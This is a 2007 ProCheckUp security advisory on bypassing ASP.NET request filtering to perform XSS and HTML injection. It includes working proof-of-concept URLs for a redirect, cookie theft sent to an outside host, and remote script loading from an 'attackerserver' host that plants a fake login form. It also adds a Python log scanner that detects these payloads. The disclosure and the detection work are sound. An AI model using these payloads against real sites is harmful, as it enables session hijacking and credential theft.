dotnet-bypass.txt

Posted Apr 7, 2007
Authored by Adrian Pastor, Richard Brain, Jan Fry | Site procheckup.com

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform cross site scripting and HTML injection attacks.

tags | exploit, xss, asp, bypass
SHA-256 | 4b78fe2bdca6f7c490f51b3622de9ef13cf64b7899eaa6f8f39a70a7ab3ae074

FYI,

The following are the technical details for the Microsoft .NET request filtering bypass vulnerability (BID 20753):


ProCheckUp Security Bulletin

This advisory has been published following consultation with UK CPNI (formerly known as NISCC)

Title: Microsoft ASP.NET request filtering can be bypassed allowing XSS and HTML injection attacks


CERT: None


Date found: 7 July, 2006

The following client/server environment was tested and found vulnerable:

- Microsoft Windows Server 2003 Standard Edition Build 3790.srv03_sp1_rtm.050324-1447 Service Pack 1
- Microsoft IIS 6.0
- Microsoft ASP .NET Framework Version 2.0.50727.42
- Microsoft Internet Explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
- Microsoft Internet Explorer 7.0.5450.4 Beta 3
- Microsoft Internet Explorer 7.0.5730.11


Severity: Medium


Credits: request filtering bypass found by Richard Brain and further researched by Jan Fry and Adrian Pastor


Vendor Status: N/A


CVE Candidate: Not assigned


Description:

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform XSS and HTML injection attacks.

It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application set up in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customers' live environments.


Notes:

In order to exploit this flaw, an attacker would need to target a .NET server-side application which does not properly sanitize input parameters before they are returned to the web browser.


Proof of concept:

In the following examples 'vuln-search.aspx' is a script that solely relies on ASP .NET request filtering, and returns user-supplied input back to the browser.

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

Redirection Attack
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com")>

Cookie stealing
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/cookiemonster.php?sid="%2bdocument.cookie)>

Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild(document.createElement("script")))></XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>

where 'xss.js' could contain a snippet that overwrites the entire document's HTML body, e.g.:

document.body.innerHTML = '<b>since we can now insert brackets without having to escape the request filtering, we\'re free to insert any HTML tags</b><br/><form name="myform" action="http://www.procheckup.com"><input type="text" name="login"><br/><input type="password" name="password"><br/><input type="submit" value="Login"></form>';myform.login.focus();


Consequences:

Attackers can hijack user accounts through XSS and HTML injection attacks against vulnerable applications that solely rely on ASP .NET request filtering.
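The following is an added example, not part of the ProCheckUp advisory: detection logic a defender could run over IIS access logs to find requests carrying the kind of CSS-expression payload the proof of concept above uses. The log lines are constructed for this example and reduced to the fields date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query and sc-status (real IIS W3C logs carry more columns, so the query field index would need adjusting); the first line carries the advisory's alert-box value, the other three are benign traffic. The indicator list and the comment-stripping normalisation are this example's own choices.

```python
import re
from urllib.parse import unquote

# Constructed, simplified IIS-style log lines (not real traffic). Fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2007-04-07 09:12:01 198.51.100.7 GET /vuln-search.aspx term=%3C/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))%3E 200
2007-04-07 09:12:05 198.51.100.8 GET /vuln-search.aspx term=asp.net+request+filtering 200
2007-04-07 09:13:44 198.51.100.9 GET /vuln-search.aspx term=style+expression 200
2007-04-07 09:14:10 198.51.100.9 GET /default.aspx - 200
"""

# CSS comments are what let 'e/**/xpression' hide the keyword from naive
# string matching; strip them before looking for indicators.
CSS_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)

# Indicators checked against the normalised query string (an assumption for
# this example). '<' is a broad signal, since legitimate search terms rarely
# contain it; 'expression(' is specific to the CSS-expression technique.
INDICATORS = ("<", "expression(")

QUERY_FIELD = 5  # index of cs-uri-query in the reduced format above


def normalise_query(query):
    """URL-decode, drop CSS comments and lower-case, so the obfuscated forms
    in the advisory match the same indicators as their plain equivalents."""
    decoded = unquote(query)
    return CSS_COMMENT_RE.sub("", decoded).lower()


def scan_log(text):
    """Return (line_number, client_ip, matched_indicators) for every request
    whose query string matches at least one indicator."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        fields = line.split(" ")
        # Skip malformed lines and requests without a query string ('-').
        if len(fields) <= QUERY_FIELD or fields[QUERY_FIELD] == "-":
            continue
        query = normalise_query(fields[QUERY_FIELD])
        matched = [ind for ind in INDICATORS if ind in query]
        if matched:
            hits.append((number, fields[2], matched))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d from %s: %s" % hit)
```

Only the first line is reported: the third line contains the word "expression" but not a call, which keeps the rule from firing on ordinary search terms. Because the advisory's payloads reach the server inside a GET query string, a log-based sweep of this kind is a cheap way to find out whether an application was probed before a code fix went in.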


Fix:

Do not rely on ASP .NET request filtering for protection; sanitize all input parameters in the server-side application, and follow a whitelisting approach when filtering input.


References:

http://www.procheckup.com/Vulner_PR0703.php
http://www.securityfocus.com/bid/20753/
http://www.cpni.gov.uk/docs/re-20061020-00710.pdf
http://www.owasp.org/index.php/Category:OWASP_.NET_Project


Legal:

Copyright 2007 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
